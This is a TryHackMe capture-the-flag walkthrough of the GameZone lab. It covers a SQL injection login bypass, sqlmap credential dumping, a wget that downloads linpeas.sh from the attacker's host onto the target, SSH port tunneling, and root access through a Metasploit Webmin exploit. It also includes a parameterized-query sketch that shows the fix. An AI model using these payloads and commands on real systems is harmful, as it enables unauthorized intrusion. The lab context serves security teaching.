GameZone | Advanced Exploitation | TryHackMe
In this walkthrough, we will be breaking into the GameZone machine, performing several attacks to get past the login, reveal vulnerable services and gain administrator privileges.
A quick look at the website shows a login form and a cartoon avatar; a reverse image search identifies him as Agent47.
SQL Injection
We need to log in to the website. Trial and error with commonly used passwords proves futile.
Since we know this site is vulnerable to SQL injection, we should try:
' or 1=1#
in both the username and password fields, and to our surprise, we are logged in.
We get some kind of a search portal.
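The login bypass above, as an added example (not code from the room or the GameZone site): a Python sqlite3 sketch of the concatenated query the payload abuses, next to a parameterized query that treats the same input as plain data. The table, the user and the SHA-256 password storage are constructed for the demo, and MySQL's '#' line comment is emulated because SQLite does not recognise it.

```python
import hashlib
import sqlite3

# Constructed demo data (not the GameZone database): one user whose password
# is stored as a SHA-256 hash rather than in plaintext.
DEMO_USERS = [("agent47", hashlib.sha256(b"videogamer124").hexdigest())]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", DEMO_USERS)
    return conn


def unsafe_login_sql(username, password):
    """Vulnerable pattern: the username is pasted straight into the SQL text."""
    pwhash = hashlib.sha256(password.encode()).hexdigest()
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND pwhash = '{pwhash}'")


def unsafe_login(conn, username, password):
    """Runs the concatenated query. MySQL treats '#' as a line comment and
    SQLite does not, so the comment is cut off here the way MySQL would."""
    sql = unsafe_login_sql(username, password).split("#", 1)[0]
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL."""
    pwhash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwhash = ?",
        (username, pwhash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1#"
    print(unsafe_login_sql(payload, "x"))       # shows the mangled WHERE clause
    print(unsafe_login(db, payload, "x"))       # ['agent47']: every user matches
    print(safe_login(db, payload, "x"))         # None: the payload is just a string
    print(safe_login(db, "agent47", "videogamer124"))  # 'agent47'
```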
With this kind of portal, we can usually try enumerating hidden directories with gobuster or ffuf, or go straight to sqlmap enumeration.
Sqlmap
In this room we will use sqlmap to reveal crucial information. First we capture the search request with Burp Suite and save it to a file.
Hurrah! We have the username and the password: 'agent47' and 'videogamer124'. We also got some interesting information: a password hash for agent47.
We can crack the hash with John the Ripper to confirm the password is right.
We can then SSH in as agent47 with that password and look for interesting information on the box.
To escalate our privileges to root, we need to find binaries or services we can leverage, and for that we use linPEAS.sh.
Linpeas.sh
python3 -m http.server 8000                # on the attacking machine, in the directory holding linpeas.sh
wget http://10.10.10.10:8000/linpeas.sh    # on the target, as agent47 (port 8000 matches the server above)
Once linpeas.sh has been downloaded to the target, we proceed to run it.
Oops! Permission denied. The file needs to be made executable first.
chmod +x linpeas.sh
From the linpeas.sh results, we find interesting open ports.
A look at the ports listening on the target:
We need to tunnel these ports to our local machine so that we can access the services locally.
Port Tunneling
ssh -L 10000:localhost:10000 <username>@<ip>
In this case, port 10000 is the one that responds; browsing to it on localhost takes us to a login page.
Using the same credentials, we are logged in.
Webmin? That sounds like a worthy shot; let's see if we find any known vulnerabilities using searchsploit.
We have the exploit to use, 'Remote Command Execution'; let's mirror it and read the instructions.
searchsploit -m exploits/unix/remote/21851.rb
The file is a Metasploit module, which means we can use Metasploit to compromise this machine.
Metasploit
Selecting the exploit unix/webapp/webmin_show_cgi_exe, we see the options that need to be set (as shown above) and run it.
We get a session and, on interacting with it, we are root.
A quick look in /root captures the root flag.
Bingo, we compromised this machine.
Thank you for reading. Happy hacking